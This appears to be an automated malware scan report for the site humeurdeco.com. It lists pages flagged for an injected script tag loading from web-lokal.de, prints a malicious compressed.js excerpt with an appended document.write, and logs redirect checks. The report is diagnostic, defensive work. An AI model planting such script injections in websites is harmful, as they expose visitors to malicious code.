Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=humeurdeco.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://humeurdeco.com/ | 200 OK Content-Length: 12684 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://web-lokal.de/clk.php?id=6258945"></script> | ||
http://humeurdeco.com/index.html | 200 OK Content-Length: 12684 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://web-lokal.de/clk.php?id=6258945"></script> | ||
http://humeurdeco.com/bois.html | 200 OK Content-Length: 12435 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://web-lokal.de/clk.php?id=6258946"></script> | ||
http://humeurdeco.com/compressed.js | 200 OK Content-Length: 8185 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var TINY={};function $(i){return document.getElementById(i)}function $$(e,p){p=p||document;return p.getElementsByTagName(e)}TINY.slideshow=function(n){this.infoSpeed=this.imgSpeed=this.speed=10;this.thumbOpacity=this.navHover=70;this.navOpacity=25;this.scrollSpeed=5;this.letterbox='#000';this.n=n;this.c=0;this.a=[]};TINY.slideshow.prototype={init:function(s,z,b,f,q){s=$(s);var m=$$('li',s),i=0,w=0;this.l=m.length;this.q=$(q);this.f=$(z);this.r=$(this.info);this.o=parseInt(TINY.style.val(z,'width document.write('<img src="http://localhost/" >'); Antivirus reports:
| ||
http://humeurdeco.com/toile.html | 200 OK Content-Length: 12212 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://web-lokal.de/clk.php?id=6258953"></script> | ||
http://humeurdeco.com/lin.html | 200 OK Content-Length: 11576 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://web-lokal.de/clk.php?id=6258949"></script> | ||
http://humeurdeco.com/references.html | 200 OK Content-Length: 9976 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://web-lokal.de/clk.php?id=6258951"></script> | ||
http://humeurdeco.com/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: humeurdeco.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 23 Aug 2014 04:21:20 GMT
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding
Content-Length: 12684
Content-Type: text/html
Set-Cookie: 60gpBAK=R1224225179; path=/; expires=Sat, 23-Aug-2014 05:37:23 GMT
Set-Cookie: 60gp=R4109777773; path=/; expires=Sat, 23-Aug-2014 05:37:23 GMT
...12684 bytes of data.
GET / HTTP/1.1
Host: humeurdeco.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 23 Aug 2014 04:21:20 GMT
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding
Content-Length: 12684
Content-Type: text/html
Set-Cookie: 60gpBAK=R1224225179; path=/; expires=Sat, 23-Aug-2014 05:37:23 GMT
Set-Cookie: 60gp=R4109777773; path=/; expires=Sat, 23-Aug-2014 05:37:23 GMT
...12684 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: humeurdeco.com
Referer: http://www.google.com/search?q=humeurdeco.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: humeurdeco.com
Referer: http://www.google.com/search?q=humeurdeco.com
Result:
The result is similar to the first query. There are no suspicious redirects found.